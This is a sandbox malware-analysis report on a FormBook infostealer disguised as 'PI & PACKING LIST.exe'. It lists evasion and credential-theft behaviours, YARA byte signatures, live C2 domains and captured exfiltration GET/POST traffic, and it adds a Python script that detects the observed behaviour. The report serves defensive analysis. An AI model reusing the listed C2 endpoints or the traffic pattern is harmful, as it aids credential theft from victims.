Windows Analysis Report
PI & PACKING LIST.exe

Overview

General Information

Sample Name: PI & PACKING LIST.exe
Analysis ID: 756334
MD5: 36fbb21511e87e8dddc8916cc2dc9367
SHA1: eda2fa3fe4b62fe3d564cf492cc31a875e8f1922
SHA256: 937c7c476bb363e55fdf1ff275c87de91ec0f550072e9a759387cc95e6c78c83
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • PI & PACKING LIST.exe (PID: 6140 cmdline: C:\Users\user\Desktop\PI & PACKING LIST.exe MD5: 36FBB21511E87E8DDDC8916CC2DC9367)
    • PI & PACKING LIST.exe (PID: 5216 cmdline: C:\Users\user\Desktop\PI & PACKING LIST.exe MD5: 36FBB21511E87E8DDDC8916CC2DC9367)
    • PI & PACKING LIST.exe (PID: 2352 cmdline: C:\Users\user\Desktop\PI & PACKING LIST.exe MD5: 36FBB21511E87E8DDDC8916CC2DC9367)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
{"C2 list": ["www.singglostudio.com/m5oe/"]}
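The tree above shows three behaviours worth turning into detections: the sample relaunches its own image twice (PIDs 5216 and 2352 under 6140), the already-running 64-bit Explorer.EXE (PID 3452) then spawns the 32-bit C:\Windows\SysWOW64\control.exe (PID 5228), and explorer.exe itself opens the HTTP connections listed under Networking below. The Python that follows is an added illustration, not part of the Joe Sandbox report: it runs those three rules over constructed Sysmon-style events built from the report's process tree and Networking section. The field names, the parent of PID 6140, and the two benign control events (a System32 child of explorer and a browser connection) are assumptions.

```python
"""Detection logic for the process-tree and network behaviour in the report.

Added example, not Joe Sandbox output. EVENTS is constructed from the
report's process tree and "Networking" section; field names, the parent
of PID 6140 and the benign control events are assumptions.
"""
from collections import Counter
from ipaddress import ip_address

SAMPLE = r"C:\Users\user\Desktop\PI & PACKING LIST.exe"
EXPLORER = r"C:\Windows\Explorer.EXE"

# Explorer.EXE (PID 3452) was already running; the report nests it under
# PID 2352 only because the sample injected into it.
EVENTS = [
    # Assumed: sample double-clicked from the shell (parent not in the report).
    {"type": "ProcessCreate", "pid": 6140, "ppid": 4000, "image": SAMPLE, "parent_image": EXPLORER},
    # Loader relaunches its own image twice (PIDs 5216 and 2352 in the report).
    {"type": "ProcessCreate", "pid": 5216, "ppid": 6140, "image": SAMPLE, "parent_image": SAMPLE},
    {"type": "ProcessCreate", "pid": 2352, "ppid": 6140, "image": SAMPLE, "parent_image": SAMPLE},
    # 64-bit shell spawning the 32-bit SysWOW64 copy of control.exe (PID 5228).
    {"type": "ProcessCreate", "pid": 5228, "ppid": 3452,
     "image": r"C:\Windows\SysWOW64\control.exe", "parent_image": EXPLORER},
    # Benign control (assumed, not in the report): shell launching a System32 binary.
    {"type": "ProcessCreate", "pid": 7000, "ppid": 3452,
     "image": r"C:\Windows\System32\notepad.exe", "parent_image": EXPLORER},
    # explorer.exe talking HTTP to the five destinations in the report.
    *[{"type": "NetworkConnect", "pid": 3452, "image": EXPLORER, "dst_ip": ip, "dst_port": 80}
      for ip in ("35.78.89.117", "162.43.120.154", "142.250.203.115",
                 "209.99.64.33", "178.128.239.245")],
    # Benign control (assumed): a browser making the same kind of connection.
    {"type": "NetworkConnect", "pid": 4444, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "dst_ip": "142.250.203.115", "dst_port": 80},
]


def detect(events):
    """Return (rule, pid, detail) triples for the three behaviours in the report."""
    findings = []
    for e in events:
        if e["type"] == "ProcessCreate":
            img, parent = e["image"].lower(), e["parent_image"].lower()
            # 1. A process launching a second copy of its own image is the usual
            #    setup for hollowing the child ("Sample uses process hollowing").
            if img == parent:
                findings.append(("self_respawn", e["pid"], f"child of {e['ppid']} has the same image"))
            # 2. The 64-bit shell resolves Windows binaries to System32; a SysWOW64
            #    child is normally reached only via the redirection a 32-bit parent
            #    gets, so here it points at 32-bit code running inside explorer.exe.
            if parent == EXPLORER.lower() and img.startswith("c:\\windows\\syswow64\\"):
                findings.append(("shell_spawns_syswow64_binary", e["pid"], e["image"]))
        elif e["type"] == "NetworkConnect":
            # 3. explorer.exe itself opening HTTP connections to public addresses.
            if (e["image"].lower() == EXPLORER.lower() and e["dst_port"] in (80, 443)
                    and ip_address(e["dst_ip"]).is_global):
                findings.append(("shell_outbound_http", e["pid"], f"{e['dst_ip']}:{e['dst_port']}"))
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'self_respawn': 2, ...}."""
    return dict(Counter(rule for rule, _, _ in findings))


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:30} pid={pid:<6} {detail}")
    print(summarize(detect(EVENTS)))
```

Run stand-alone, the script flags PIDs 5216, 2352, 5228 and the five explorer.exe connections and stays silent on the two benign controls. Rule 2 is the one most worth tuning in production: 32-bit third-party software legitimately spawns SysWOW64 helpers, so scope the rule to the shell (and other 64-bit system processes) as the parent rather than to any process.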
Source | Rule | Description | Author | Strings
00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x100a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x8df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x86a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x8cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x8e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x78ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xee17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xfe0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0xb119:$sqlite3step: 68 34 1C 7B E1
    • 0xbc91:$sqlite3step: 68 34 1C 7B E1
    • 0xb15b:$sqlite3text: 68 38 2A 90 C5
    • 0xbcd6:$sqlite3text: 68 38 2A 90 C5
    • 0xb172:$sqlite3blob: 68 53 D8 7F 8C
    • 0xbcec:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(Yara match table truncated here; the full report lists 24 entries)
      No Sigma rule has matched
      No Snort rule has matched


      AV Detection

      Source: PI & PACKING LIST.exe | ReversingLabs: Detection: 76%
      Source: PI & PACKING LIST.exe | Virustotal: Detection: 57%
      Source: Yara match | File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 | Avira URL Cloud: Label: malware
      Source: http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 | Avira URL Cloud: Label: malware
      Source: http://www.bengalindex.com/m5oe/ | Avira URL Cloud: Label: malware
      Source: http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 | Avira URL Cloud: Label: malware
      Source: http://www.nu2uresale.store/m5oe/ | Avira URL Cloud: Label: malware
      Source: http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 | Avira URL Cloud: Label: malware
      Source: http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 | Avira URL Cloud: Label: malware
      Source: http://www.p-soils.com/m5oe/ | Avira URL Cloud: Label: malware
      Source: http://www.cpitherapy.com/m5oe/ | Avira URL Cloud: Label: malware
      Source: PI & PACKING LIST.exe | Joe Sandbox ML: detected
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.singglostudio.com/m5oe/"]}
      Source: PI & PACKING LIST.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: PI & PACKING LIST.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

      Networking

      Source: C:\Windows\explorer.exe | Network Connect: 35.78.89.117 80
      Source: C:\Windows\explorer.exe | Network Connect: 162.43.120.154 80
      Source: C:\Windows\explorer.exe | Network Connect: 142.250.203.115 80
      Source: C:\Windows\explorer.exe | Domain query: www.bengalindex.com
      Source: C:\Windows\explorer.exe | Domain query: www.nu2uresale.store
      Source: C:\Windows\explorer.exe | Network Connect: 209.99.64.33 80
      Source: C:\Windows\explorer.exe | Domain query: www.zkjk888.com
      Source: C:\Windows\explorer.exe | Network Connect: 178.128.239.245 80
      Source: C:\Windows\explorer.exe | Domain query: www.p-soils.com
      Source: C:\Windows\explorer.exe | Domain query: www.cpitherapy.com
      Source: C:\Windows\explorer.exe | Domain query: www.gebouwpas.online
      Source: Malware configuration extractor | URLs: www.singglostudio.com/m5oe/
      Source: Joe Sandbox View | ASN Name: AMAZON-02US
      Source: global traffic | HTTP traffic detected:
        GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1
        Host: www.zkjk888.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1
        Host: www.cpitherapy.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1
        Host: www.p-soils.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1
        Host: www.bengalindex.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1
        Host: www.nu2uresale.store
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic | HTTP traffic detected:
        POST /m5oe/ HTTP/1.1
        Host: www.cpitherapy.com
        Connection: close
        Content-Length: 187
        Cache-Control: no-cache
        Origin: http://www.cpitherapy.com
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Referer: http://www.cpitherapy.com/m5oe/
        Accept-Language: en-US
        Accept-Encoding: gzip, deflate
        Data Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 37 5f 73 34 4d 6c 67 48 78 4f 42 34 6c 5a 30 4e 6d 37 6a 72 4b 34 71 4a 48 45 36 63 78 34 47 33 69 4b 64 52 45 70 44 54 28 78 50 6f 66 61 6c 57 61 75 43 6f 4f 58 48 42 65 69 37 48 45 36 30 67 44 4e 41 6d 31 4e 78 32 58 61 34 63 63 64 77 33 43 64 48 61 77 6f 54 35 43 47 7a 5a 51 78 56 49 38 46 71 5f 34 76 6c 57 6d 62 35 36 6d 71 48 6c 74 70 66 6d 69 58 72 36 56 31 70 6b 4d 41 48 77 4f 70 6f 51 6f 61 63 61 72 33 77 6a 4a 64 4a 56 41 33 32 5a 47 32 67 6b 6f 6f 34 49 4c 69 28 49 37 32 43 45 5a 77 29 2e 00 00 00 00 00 00 00 00
        Data Ascii: l48xI=HfFUuYfGoA687_s4MlgHxOB4lZ0Nm7jrK4qJHE6cx4G3iKdREpDT(xPofalWauCoOXHBei7HE60gDNAm1Nx2Xa4ccdw3CdHawoT5CGzZQxVI8Fq_4vlWmb56mqHltpfmiXr6V1pkMAHwOpoQoacar3wjJdJVA32ZG2gkoo4ILi(I72CEZw).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 36 66 63 34 4e 47 34 48 6b 65 42 37 67 5a 30 4e 76 62 6a 76 4b 34 6d 4a 48 42 43 32 79 4b 71 33 69 62 4e 52 44 4e 6a 54 6b 78 50 6f 4f 36 6b 64 65 75 44 74 4f 58 36 36 65 6a 4b 38 45 34 34 67 43 66 34 6d 79 74 78 31 56 36 34 49 52 39 77 30 4e 39 48 61 77 6f 65 57 43 48 79 73 51 78 64 49 38 33 69 5f 34 74 39 5a 6d 4c 35 42 70 4b 48 6c 74 70 44 58 69 58 72 41 56 31 51 76 4d 42 6e 77 63 4b 77 51 6b 72 63 56 73 6e 77 67 44 39 49 59 50 45 72 4c 41 45 73 56 67 75 30 4e 63 6e 57 4a 37 43 54 39 4e 6a 41 49 57 4d 59 38 4b 59 4b 46 38 35 44 4d 5a 51 59 68 38 50 6d 6f 59 50 4d 75 57 43 73 74 36 64 68 38 74 2d 59 53 36 48 56 4c 76 54 65 70 58 74 66 7a 6f 35 49 66 45 4f 63 6a 78 35 6f 46 30 61 35 50 6d 73 57 54 37 62 64 41 77 31 38 46 56 36 53 49 38 79 59 71 28 77 75 4b 7a 2d 68 71 32 65 71 4b 4b 51 56 5a 41 46 6c 75 39 59 6d 31 5a 74 69 45 6e 4d 7e 51 77 30 35 54 79 73 5a 67 52 7a 4b 4e 47 66 78 33 76 6f 4b 53 6d 74 70 50 32 59 53 44 44 61 33 79 4c 45 6f 73 61 4e 4f 2d 37 53 78 58 73 6c 35 71 57 4a 71 67 6a 70 59 52 33 57 4c 54 54 79 6f 6e 58 45 47 6d 5a 33 79 69 69 37 42 36 6b 47 4f 65 76 30 76 4c 30 34 6c 74 62 53 55 65 48 69 6b 73 36 6c 49 54 49 73 57 5a 7a 51 32 65 4e 48 76 72 6d 6d 70 73 43 73 77 68 7e 55 71 36 56 35 74 50 4a 55 4f 58 67 6b 78 59 77 49 43 2d 47 41 51 69 50 4d 38 53 6f 50 70 4a 39 37 61 54 38 34 6b 36 76 4d 51 4f 32 32 46 42 6e 50 4c 52 70 5a 34 44 5a 64 30 65 6a 6b 6f 6b 35 47 58 4c 6c 47 59 55 49 47 28 53 51 38 6a 5a 74 66 64 4c 35 66 4d 69 72 6a 53 6f 53 33 33 55 6a 4e 58 5a 
47 74 34 4a 53 62 44 4c 5a 50 5a 54 48 54 6c 30 57 43 6d 5f 28 41 5a 31 6a 47 59 47 53 4c 4d 44 53 4d 68 30 36 63 63 53 34 68 6c 75 6d 70 43 31 46 52 39 68 58 74 68 54 57 37 49 67 6c 4c 46 66 64 6f 36 49 79 43 71 64 38 6f 47 4e 4f 72 4d 65 57 58 73 70 4a 58 4a 4c 4c 71 45 51 48 38 31 6d 31 5a 5a 58 38 51 6b 44 36 58 6f 47 56 63 69 6c 36 4d 6d 58 6c 71 47 35 42 2d 53 4d 56 67 35 72 38 42 51 4a 59 70 72 44 6c 6a 47 55 51 74 57 79 6c 37 38 54 4c 45 49 66 31 33 76 7a 78 39 41 35 41 4f 50 37 75 2d 66 79 7e 56 52 78 62 35 63 56 53 63 74 51 4b 4c 70 59 48 64 32 52 4f 31 79 59 6a 6e 46 2d 6b 59 67 35 4b 43 63 36 79 31 71 71 44 51 51 33 6d 6b 72 4f 53 65 69 2d 7e 6f 53 75 7a 33 35 73 33 71 68 52 79 75 37 73 63 78 6a 36 75 46 57 52 66 38 79 47 7a 5a 48 36 66 70 35 46 47 79 31 66 67 57 50 65 63 53 4a 39 30 30 28 7a 76 68 62 6a 67 64 79 72 4c 42 4f 33 53 55 61 7a 7e 7a 56 7a 33 57 44 42 54 64 55 45 6e 77 73 54 45 69 46 53 49 71 6c 50 47 75 4e 56 6c 4a 51 71 38 72 7e 37 58 5f 70 58 6f 69 78 70 31 39 69 55 58 64 39 33 78 5f 6
      Source: global traffic | HTTP traffic detected:
        POST /m5oe/ HTTP/1.1
        Host: www.p-soils.com
        Connection: close
        Content-Length: 187
        Cache-Control: no-cache
        Origin: http://www.p-soils.com
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Referer: http://www.p-soils.com/m5oe/
        Accept-Language: en-US
        Accept-Encoding: gzip, deflate
        Data Raw: 6c 34 38 78 49 3d 44 69 7a 30 4b 45 43 77 56 65 4a 57 66 66 65 6d 4a 33 62 33 47 78 48 4b 58 75 6e 49 56 6d 31 33 70 6f 44 34 4c 6c 46 46 51 75 33 33 41 59 45 72 65 38 39 31 46 72 7e 61 55 49 31 37 31 32 76 6b 77 4c 54 48 6e 48 6d 53 6f 72 43 49 6a 34 42 36 37 6a 41 44 4e 61 51 30 7a 2d 6c 4d 4b 48 46 62 30 58 4d 66 36 67 57 66 7e 67 62 6c 4c 58 76 6c 41 36 64 57 6c 4a 64 56 7e 61 6f 37 34 6e 4a 79 69 30 68 52 32 6e 30 33 76 34 77 6f 43 6a 7e 70 78 72 4d 79 75 6e 37 53 49 53 57 5f 59 67 52 46 37 7a 72 54 6e 61 56 36 73 6e 77 50 5a 32 75 49 34 77 29 2e 00 00 00 00 00 00 00 00
        Data Ascii: l48xI=Diz0KECwVeJWffemJ3b3GxHKXunIVm13poD4LlFFQu33AYEre891Fr~aUI1712vkwLTHnHmSorCIj4B67jADNaQ0z-lMKHFb0XMf6gWf~gblLXvlA6dWlJdV~ao74nJyi0hR2n03v4woCj~pxrMyun7SISW_YgRF7zrTnaV6snwPZ2uI4w).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.p-soils.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.p-soils.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.p-soils.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 44 69 7a 30 4b 45 43 77 56 65 4a 57 66 2d 75 6d 4b 51 76 33 52 68 47 34 62 4f 6e 49 65 47 30 38 70 6f 50 34 4c 6e 6f 65 51 63 37 33 44 4b 73 72 5a 66 56 31 44 72 7e 61 42 59 31 5f 28 57 76 79 77 49 75 38 6e 46 4f 6b 6f 74 61 49 69 71 70 36 28 44 41 41 4f 36 51 31 79 4f 6b 61 53 6e 46 62 30 58 4a 6a 36 68 57 50 7e 67 6a 6c 4c 45 33 6c 41 38 4a 56 33 70 64 55 79 36 6f 37 34 6e 56 78 69 30 67 6d 32 6e 74 73 76 35 51 6f 44 32 36 70 69 75 67 74 70 33 37 56 42 79 58 39 52 79 73 63 28 67 6a 55 69 4a 5a 5f 75 53 52 59 4e 56 53 44 74 47 41 46 44 6c 41 79 4a 39 73 45 6d 7a 47 6a 73 38 47 51 59 64 5a 38 45 73 32 2d 37 65 58 71 51 72 33 65 52 63 4d 38 39 50 47 31 64 56 78 63 6e 53 39 4b 4f 70 79 74 30 55 61 69 54 5a 52 37 6c 41 65 36 78 55 63 70 5a 5a 66 49 37 4d 67 71 38 53 34 41 56 68 59 50 78 36 66 37 39 49 69 45 75 36 4f 61 67 50 7a 4c 32 73 41 6a 56 66 4c 56 65 76 38 66 6a 4b 70 43 47 6c 46 77 69 6e 68 52 52 4e 4a 58 69 57 50 78 43 31 77 41 45 58 63 6d 59 71 78 70 75 4f 58 55 4a 44 36 35 79 7a 38 39 31 43 46 70 71 63 4b 72 43 4a 4b 30 50 36 67 68 39 70 48 73 47 2d 49 51 32 30 56 35 6c 46 36 67 75 30 35 75 6b 4c 77 78 44 44 68 55 79 78 58 45 4b 78 54 6c 32 32 37 30 45 6d 59 73 76 55 30 78 4a 65 30 61 77 52 79 62 30 36 7a 4b 31 5f 66 79 28 46 52 50 31 6c 64 76 6e 72 5a 32 4a 4e 4a 37 50 42 4f 5a 36 5f 75 43 42 55 33 66 69 30 44 46 79 31 76 55 77 65 65 55 6d 4a 32 42 46 4a 70 79 56 51 32 62 6d 4f 7e 43 35 6f 78 4c 62 72 71 6c 52 74 6a 47 4d 49 7a 77 67 4e 28 50 70 67 28 51 34 42 31 55 71 31 51 33 6c 76 52 6d 30 51 46 69 70 37 76 37 6f 6f 4d 
70 63 6d 77 56 52 79 7e 39 4e 79 37 75 59 73 57 46 74 44 65 46 78 47 31 64 4d 78 43 52 33 33 54 76 37 79 73 2d 7a 67 4d 69 44 38 77 72 72 77 58 33 49 42 39 74 55 38 70 75 4c 66 74 31 5a 57 77 74 63 63 55 74 45 37 34 49 36 50 56 56 45 35 6d 44 62 70 31 43 38 70 6b 35 6a 68 6e 59 69 43 65 52 63 77 70 52 28 44 6d 53 69 69 58 74 44 4a 54 5a 38 74 65 79 59 76 39 6f 70 76 4c 5f 72 6f 57 32 39 48 56 66 68 44 6a 68 38 74 79 77 49 65 33 63 47 34 36 65 6a 6c 34 55 36 59 57 79 71 34 77 75 76 70 30 6c 34 4e 45 71 77 65 49 73 6d 45 7e 6f 30 74 6d 56 4a 74 34 2d 6c 43 64 69 57 2d 6b 45 50 4e 48 57 57 69 4d 68 70 33 6b 48 78 35 78 6e 74 39 57 52 73 62 61 49 4a 56 7a 63 70 6a 4b 41 77 37 64 6a 4a 6e 5a 72 74 56 45 64 34 65 75 77 69 4d 6d 42 56 48 59 4f 67 42 77 77 59 6f 69 56 47 31 6a 65 55 68 54 68 4b 32 4a 67 4a 54 48 6d 36 39 64 34 4c 4e 78 68 53 31 50 6f 6f 75 62 62 6d 54 4d 42 4c 42 38 66 67 30 71 39 4d 5f 6c 57 49 51 7a 46 63 4b 7a 57 36 73 4e 70 6c 4b 51 44 6a 68 38 78 57 69 46 67 6c 7a 28 6d 74 62 52 36 6c 44 6d 74 35 6
      Source: global traffic | HTTP traffic detected:
        POST /m5oe/ HTTP/1.1
        Host: www.bengalindex.com
        Connection: close
        Content-Length: 187
        Cache-Control: no-cache
        Origin: http://www.bengalindex.com
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Referer: http://www.bengalindex.com/m5oe/
        Accept-Language: en-US
        Accept-Encoding: gzip, deflate
        Data Raw: 6c 34 38 78 49 3d 28 70 34 46 61 58 6e 62 4c 56 54 41 57 64 43 51 54 77 72 6b 31 4b 36 2d 6f 7a 66 4a 37 4e 64 30 48 39 4d 6c 76 50 77 64 63 62 32 33 50 6e 34 4d 4d 72 43 56 6a 64 6c 45 31 35 62 33 65 34 31 57 5a 50 61 61 42 67 45 77 62 57 5a 71 30 43 7e 43 57 43 72 61 65 49 34 6d 51 4d 38 63 49 7a 34 77 77 36 30 65 58 56 51 6d 35 57 79 53 42 78 48 66 4c 73 43 68 70 4f 55 6b 54 39 28 52 68 68 31 70 45 49 7a 73 52 78 54 46 46 4d 58 4e 46 4d 68 79 6c 6f 4a 46 61 65 65 67 54 65 6c 33 4e 42 77 58 50 42 52 6e 42 4f 78 68 63 76 72 67 6b 78 41 50 7e 77 29 2e 00 00 00 00 00 00 00 00
